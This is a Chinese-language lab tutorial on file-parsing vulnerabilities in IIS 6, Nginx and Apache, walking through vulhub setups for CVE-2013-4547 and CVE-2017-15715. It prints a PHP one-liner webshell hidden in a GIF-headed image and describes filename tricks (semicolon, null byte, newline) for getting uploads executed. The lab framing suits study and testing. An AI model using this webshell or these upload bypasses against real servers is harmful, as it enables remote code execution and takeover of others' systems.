文件解析漏洞 iis apache nginx中间件相关漏洞详解

1.虚拟机下载

MSDN, 我告诉你 - 做一个安静的工具站 该网址中有所需要的所有操作系统,详细信息中有下载地址,复制后打开迅雷会自动跳转等待下载完成即可。

2.安装虚拟机

下载后会有一个光盘映像文件,打开VM在VM中创建虚拟机按下列图片走即可。

所需要的所有虚拟机安装方式均与上面方式相同

IIS安装

打开控制面板,添加或删除程序,添加或删除Windows组件,应用程序服务器。安装即可

IIS解析漏洞

1.iis6.x

环境:Windows server 2003+iis6

  1. 目录解析

在IIS网站下创建一个1.asp目录放入1.txt文件,并输入 <%= Now() %> asp语句

在网站访问该目录下的1.txt文件即可将里面的asp语句解析执行

如果遇到无法访问403的问题,右击网站点击属性执行权限更改即可。

  1. 畸形文件解析

在IIS 6 中分号也可以起到截断的作用 1.asp;.jpg是可以当做asp文件解析的

在网站中创建一个1.asp;.jpg文件进行访问,返回的页面是解析asp执行后的文件

向asa/cer/cdx都是可以被当做asp执行的

Nginx解析漏洞

1.Nginx_parsing

利用条件:

Nginx<=0.8.37 cgi.fix_pathinfo=1

使用vulhub开启容器,创建nginx_parsing_vulnerability漏洞环境。当访问文件时如果URL中有不存在的文件,php会向前解析,在一个文件加上/.php会将文件解析为php文件

复制代码
cd /nginx/nginx_parsing_vulnerability
docker-compose build
docker-compose up -d
docker ps -a

创建一个图片马进行上传

复制代码
GIF89a
<?php @eval($_POST[cmd]);?>

上传成功,访问时加上/.php将文件解析为php文件

使用蚁剑连接

Nginx CVE-2013-4547

开启vulhub环境后访问

编写1.jpg

进行上传抓包,将上传文件名后缀加两个空格.php,然后进入十六进制里面吧第二个空格的20改为00后放行。

访问上传的文件抓包,因为上传时更改了后缀名所以抓包更改。

这样就代表已经访问到木马了,生成了新的shell.php我们去访问这个文件然后使用蚁剑连接即可。

Apache解析漏洞

Apache_parsing

Apache1.x/2.x中解析文件的规则是从右到左解析,后缀无法解析就继续往左解析,所以我们是可以使用1.php.jpg里面写php一句话木马,这样就可以执行到php后缀时将其解析。

将创建的文件提交后访问可使木马运行,进行连接

CVE-2017-15715

开启漏洞环境后访问,上传文件后会给我们进行重命名

该漏洞在解析 1.php\x0A将被按照php后缀进行解析,所以我们在上传文件的时候抓包修改重命名后的文件名,在后面添加空格后将十六进制改为0a后放行,我们再次访问我们的代码时要将我们的0a改回来才可以访问到

相关推荐
q***51896 小时前
离线安装 Nginx
运维·数据库·nginx
Csxyzj6 小时前
nginx
服务器·nginx
迦蓝叶8 小时前
Apache Jena:利用 SPARQL 查询与推理机深度挖掘知识图谱
java·数据挖掘·apache·知识图谱·查询·知识挖掘·推理机
JosieBook10 小时前
【数据库】Apache IoTDB数据库在大数据场景下的时序数据模型与建模方案
数据库·apache·iotdb
mzlogin13 小时前
解决访问 https 网站时,后端重定向或获取 URL 变成 http 的问题
java·后端·nginx
在这habit之下14 小时前
nginx介绍与简单操作
运维·nginx
SeaTunnel1 天前
结项报告完整版 | Apache SeaTunnel支持metalake开发
apache
冰_河1 天前
《Nginx核心技术》第11章:实现MySQL数据库的负载均衡
后端·nginx·架构
q***23571 天前
使用 Nginx 搭建代理服务器(正向代理 HTTPS 网站)指南
运维·nginx·https
java_logo1 天前
NGINX WEBUI Docker 容器化部署指南
运维·nginx·docker·容器·centos·rabbitmq·运维开发